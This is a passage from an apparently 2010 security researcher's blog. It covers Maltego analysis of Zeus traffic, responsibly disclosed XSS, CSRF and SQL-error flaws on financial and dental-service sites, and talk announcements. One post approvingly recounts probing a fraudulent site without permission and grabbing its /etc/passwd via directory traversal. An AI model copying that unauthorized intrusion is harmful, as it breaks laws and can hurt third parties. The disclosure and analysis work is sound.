6. The Command field should point to Python binary (C:\Python25\python.exe on Windows, /usr/bin/python
on Ubuntu 9.10).
7. The Parameters field should refer only to the transform name. Example: GetSourceClients.py
8. Work Directory should be the complete path to the directory where you keep the Nmap local transform Python scripts (suggest C:\localTransforms\pyCSV for Windows users).
9. Finish, then Save.

You'll also need a copy MaltegoTransform.py in your local transforms directory (included with the Maltego python lib during installation).

During a recent Zeus bot investigation, I used GetSourceClients.py and GetDestinationClients.py as follows:

1) Convert zeus.pcap, captured during malware analysis in a virtual ennvironment,
to zeus.csv: tcpdump -vttttnnelr zeus.pcap | tcpdump2csv.pl "sip dip dport" > zeus.csv

2) Drag a Phrase entity into the Maltego workspace, and using CopyPath, pasted the full path to the zeus.csv into the Phrase entity.

3) Right-clicked the Phrase entity, chose All, then getSourceClients.

4) Right-clicked the IP entity created for my infected host, chose All, then getDestinationClients.

5) Egress traffic to a likely malicious host immediately jumped out of the Maltego workspace at me. I right-clicked (after removing the port reference in the IP entity label) and selected AllTransforms.

6) Maltego's results were swift and validated my immediate assumption. 115.100.250.105 is a malicious Chinese (omg, really?) Zeus C&C server. Nice.
Highlighting a Website entity then choosing Detail View will tell you everything you need to know.

"Size matters not. Look at me. Judge me by my size, do you? Hmm? Hmm. And well you should not. For my ally is Maltego, and a powerful ally it is."

Yoda's right. ;-)

If you have any questions or would like saved transforms, PCAPs, or binary samples, ping me at russ at holisticinfosec dot org.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Presentations available: RSA, ISACA, and Agora

2010-03-21T11:31:00.000-07:00

It's been a busy month of presentations including RSA Conference 2010, ISACA Puget Sound, and the Agora.
The Agora is a "successful strategic association that meets quarterly to bring together the pacific Northwest's top information systems security professionals and technical experts, as well as officers from the private sector, public agencies, local, state and federal government and law enforcement."
At RSA and Agora I discussed tactics intended to compare security data visualization to strictly textual output generated by IDS/IPS. These discussions included details on AfterGlow, Rumint, NetGrok, and Maltego.
At the ISACA Puget Sound chapter meeting I covered securing the company web presence (common security threats to your web presence and what you can do about it). This talk included details specific to the OWASP Top 10 and the CWE/SANS Top 25.
The RSA presentation is here.
The ISACA presentation is here.
The Agora presentation is available upon request (russ at holisticinfosec dot org).

There are PCAPS, scripts, and binary samples discussed in all of these presentations. Should you wish copies of any or all, please contact me.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

#6 of the Top Vulnerability Discoverers of 2009

2010-03-11T20:45:00.000-08:00

As I was last year, I am again pleased to report that the vulnerabilities I've been happily and responsibly disclosing and posting have resulted in 6th place on the list of Top Vulnerability Discoverers of 2009. Thanks to Scott Moore of the IBM ISS Frequency X Blog who compiled the list for 2009.
I remain both pleased and disconcerted to find myself on this list and wish to convey a few thoughts on the subject.

1) First, a reminder that my work has focused entirely on vulnerable web apps and pales in comparison to the likes of others named on both the all-time list and the list for 2009. Congratulations and well done to you all.

2) My efforts resulted in what the Frequency X post indicates is 48 unique web application vulnerabilities in 2009. This again serves as a stark reminder of what a challenged state of affairs the development process is for so many web application vendors. May the SDL and its ilk prevail.

3) I will continue my discovery and reporting efforts with the intention of somehow making a dent in the statistics (unrealistic, I know). I focused heavily on cross-site request forgery (CSRF) issues in 2009 and was not surprised to find that the average number of days for CSRF vulnerabilities to be resolved increased by 37 days to 93 days.

The above figure can be found on page 7 of the 8th Edition of WhiteHat's Website Security Statistics Report.
I believe, as the report states, that much of the reason CSRF issues linger unabated is that "no one at the organization knows about, understands, or respects the issue."
I can tell you from personal experience, I heard this many times in 2009.
It should therefore surprise no one that CSRF is number four on the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors.
Hopefully, each application discovered and reported as vulnerable to this issue leads to a downward statistical trend in the likes of the WhiteHat report.

I look forward to continued discussions of these issues with you, dear readers, and hope we can make a difference.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

RSA: Visualizing the Zeus attack against government and military

2010-03-02T20:52:00.000-08:00

In keeping with my presentation this Friday at RSA, I managed to time my toolsmith topic to correlate precisely; specifically, visualizing the recent Zeus attack against government and military. For the article I discuss NetGrok and AfterGlow; for the RSA presentation I'll be more focused on NetGrok and Maltego as the present more readily for a live audience. Now that "advanced persistent threat" or APT is the latest buzz word/acronym/phrase we can reminisce that good old Zeus was amongst the best and brightest of early APT adopters. ;-)

From the RSA presentation abstract:
The flood of raw data generated by intrusion detection systems (IDS) is often 0verwhelming for security specialists, and telltale signs of intrusion are sometimes overlooked in all the noise. Security visualization tools provide an easy, intuitive
means for sorting through the dizzying data and spotting patterns that might indicate intrusion…the presentation will focus on specific tools and methodology to aid you in establishing security data visualization practices in your environment.

From the article:
I’ll accentuate this theme as the crux of our toolsmith discussion this month while discussing NetGrok and After-Glow and additionally introduce timely sample analysis of the targeted Zeus bot attacks in early February against U.S. government institutions.

See how that all pulls together? ;-)
The article is here.
The RSA presentation is in Orange Room 306 at 10:10 on Friday, March 5.
If you're attending RSA, I hope to see you there.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Financials and the need for software regression testing

2010-03-01T11:35:00.000-08:00

SearchFinancialSecurity.com just published my article regarding Financials and the need for software regression testing.
This article cites Ameriprise as an example of a financial services provider who would benefit from improved regression testing and version control.

This article was actually written prior to the recent SQL bug I discussed involving Ameriprise, and is made even more interesting by discussion of a possible small, unrelated Ameriprise data breach in New Hampshire.

I truly hope Ameriprise takes a close look at the suggestions offered and moves towards enhancing security practices on behalf of their consumers.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Online finance flaw: Ameriprise III - please make it stop

2010-02-23T21:35:00.000-08:00

NOTE: This issue was disclosed responsibly and repaired accordingly.

"Now what?", you're probably saying. Ameriprise again? Yep.
I really wasn't trying this time. Really.
There I was, just sitting in the man cave, happily writing an article on version control and regression testing.
As the Ameriprise cross-site scripting (XSS) vulnerabilities from August 2009 and January 2010 were in scope for the article topic, due diligence required me to go back and make sure the issue hadn't re-resurfaced. ;-)
I accidentally submitted the JavaScript test payload to the wrong parameter.
What do you think happened next?
Nothing good.
I reduced the test string down to a single tic to validate the simplicity of the shortcoming; same result.

At the least, this is ridiculous information disclosure, if not leaning heavily towards a SQL injection vulnerability.
As we learned the last two times we discussed Ameriprise, the only way to report security vulnerabilities is via their PR department, specifically to Benjamin Pratt, VP of Public Communications.
Alrighty then, issue reported and quickly fixed this time (same day)...until some developer rolls back to an old code branch or turns on debugging again.

We all know the ColdFusion is insanely verbose, particularly when in left in debugging mode, but come now...really?
I really didn't want to know the exact SQL query and trigonometry required to locate an Ameriprise advisor.
Although, after all this, I can comfortably say I won't be seeking an Ameriprise advisor anyway.

Please Mr. Pratt, tell your web application developers to make it stop.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Directory traversal as a reconnaissance tool

2010-02-07T20:00:00.000-08:00

Like most of you, I find malicious or fraudulent online advertisers annoying to say the least.
My typical response, upon receipt of rogue AV pop-ups, or redirects to clearly fraudulent sites, is to "closely scrutinize" the perpetrating site.
This effort often bears fruit as is evident in the following analysis.

My interest was recently peaked when being made aware of a number of related sites committing abuse against a variety of brands; all quite clearly in violation of copyrights and trademarks.
An example, for your consideration: messenger-download.info
After a little exploration it was quickly determined that these cretins seek only to con victims out of credit card data with the promise of illegal downloads for a fee.
Apparently these dbags have been at it for awhile.
They make it look like you're going to receive access to a legitimate offering then they suck you in to freedownloadzone.com.
This, of course, pissed me off, so...off to the races.
A poke here, a tickle there, and voila.../etc/passwd.

This Centos server, running Apache 2.2.3 (very dated), complete with craptastic PHP code, is a textbook lesson in how to not run a web server.
Includes, anyone?

What's lovely about grabbing /etc/passwd with directory traversal (file path traversal, if you prefer) is the discovery of all the additional abusive URLs in play on this same server. Additionally you'll note more than a few culprits, learned to be based in the Phillipines after running their user names through Maltego.
Here's a text dump of the raw /etc/passwd grab.

A little regex parsing produced 256 +/- URLs, all pointing back to freedownloadzone.com, and all GoDaddy domains (shocking!).
Rather than post all the URLs here, for brevity, please refer to the text file.

Lesson to be learned for the bad guys: secure development practices apply to you as well, or the whitehats may come knocking.

A parting thought for freedownloadzone.com, and it's shadow org, helpmedownload.com.
By the way, you have XSS issues too: http://bit.ly/cT2P8F

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

toolsmith: Firefox Addons for the Security-minded

2010-02-02T15:23:00.000-08:00

Few websites are safe from a hearty probe when I come by for a visit, and I'd be remiss if I didn't share some of my favorite Firefox add-ons utilized as part of said probing.
I opted to do just this as the topic for February's toolsmith, and focused on the expected standards (NoScript, FoxyProxy Standard, BetterPrivacy, and Torbutton) as well as some of my less known favorites.

PassiveRecon
Justin Morehouse’s PassiveRecon will let you dig up everything you ever wanted to know about a given site you may be browsing or analyzing.

WorldIP
WorldIP from WIPmania.com is very cool and very useful.
It provides everything you could every need to know or trace with regard to IP addresses and geolocation.

Groundspeed
I saved the best for last; a new powerhouse in my web app sec arsenal.
Felipe Moreno-Strauch’s Groundspeed, a newer add-on “that allows security testers to manipulate the application user interface to eliminate annoying limitations and client-side controls that interfere with the web application penetration tests.”
And this it does well. ;-)

The article is live for your reading pleasure here.

Cheers and enjoy.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Online finance flaw: Ameriprise FAIL...again

2010-01-29T14:49:00.001-08:00

Here we go again.
The cross-site scripting (XSS) issues on the Ameriprise advisor locator site were fixed, even if temporarily, back when Dan Goodin reported on the issue in August.
A little bird whispered in my ear the other day and told me a sad tale:
they're baaaaack.
Regression testing anyone?
Regression testing (from the Wikipedia entry recommends that:
"in most software development situations it is considered good practice that when a bug is located and fixed, a test that exposes the bug is recorded and regularly retested after subsequent changes to the program.
What a grand idea! Ensure that you don't reintroduce old flaws when you roll old code.
Really? I have to say it?
Apparently.

Dan & El Reg have covered the issue again given that, in order to have it fixed again, I had to ask him to ping the Ameriprise PR department.

*sigh*

BTW...the issue is fixed, for now. ;-)

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

DEF CON 17 CSRF Videos Remastered

2010-01-20T20:11:00.000-08:00

Thanks to Adam Gerstein for reminding me to get off my butt and produce the Def Con 17 CSRF videos in a more streamable format.
Adobe Flash Player required; no, I won't pwn you.
If you'd like to see the whole presentation video, goofy as it may be, it's here.
Be forewarned, it's freaking huge and takes a fat pipe to pull it down in any reasonable amount of time.
The presentation slides are here.

The Dokeos CSRF PoC video is here.

The Linksys CSRF PoC video is here.

The osCommerce CSRF PoC video is here.
Note: Please don't use osCommerce, they still haven't fixed this and probably never will.

BONUS VIDEO (discussed but not shown at Def Con)
The Netgear CRSF PoC video is here (QuickTime and sorta crappy, sorry).

Enjoy.
Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Drilling into web application flaws & HIPAA: the root of the issue

2010-01-18T20:56:00.000-08:00

Herein we merge dental hygiene with development hygiene. ;-)

I recently changed dentists, and after my fist visit (successful and pleasant) I soon received follow up email from Demandforce D3 on behalf of my new dentist. Said email pointed me to an application feature that included the ability to set my email preferences for future contact as well as additional functionality.
I'll present the $64,000 questions right up front.
My understanding of website HIPAA requirements adhere to the following statement from Einstein Medical:
"Since practice web sites provide for email correspondence from potential or current patients that may contain protected health information, practice web sites must be HIPAA compliant."
"HIPAA requires health care providers to implement secure networks for the transmission of all private health information, including information contained in email correspondence."

For information transmission to be considered secure, three elements are necessary:

1) Authentication – identification of the senders/receivers of the information (i.e. must have a unique username)

If I can XSS a HIPAA protected site and can steal the auth cookie, is authentication sound?

2) Non-repudiation – verification that the senders/receivers of the information are who they say they are (i.e. must use a password)

If I can CSRF a HIPAA protected site is non-repudiation guaranteed?

3) Integrity – verification that information cannot be tampered with in transit (i.e. the information is sent through a network that cannot be easily “hacked” or “broken into”)

Both XSS and CSRF are, in essence, tampering when used to an attackers advantage; thus integrity is in question.

As I reviewed the Demandforce D3 application I was immediately struck by what appeared to be flawed dentistry...er, development, and discovered an input cavity in dire need of filling. I know, I know...stick to your day job, Russ.
Fine, screen shots below for your consideration.

While considering the above mentioned authentication, non-repudiation, and integrity bullet points above, please take note of the cookie in Figure 1 and complete XSS defacement in Figure 2, which could just as easily be a fake logon page.

Figure 1

Figure 2

Thinking the best path to Demandforce D3 would be through my new dentist, I contacted the office manger, who immediately forwarded my email to Demandforce D3.
Demandforce D3 quickly remediated the issues, quietly but successfully.

So I ask you, compliance experts, what of web application security flaws and HIPAA?
Are my interpretations accurate or am I just another pretty smile with no substance?
I look forward to your feedback, comments welcome.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)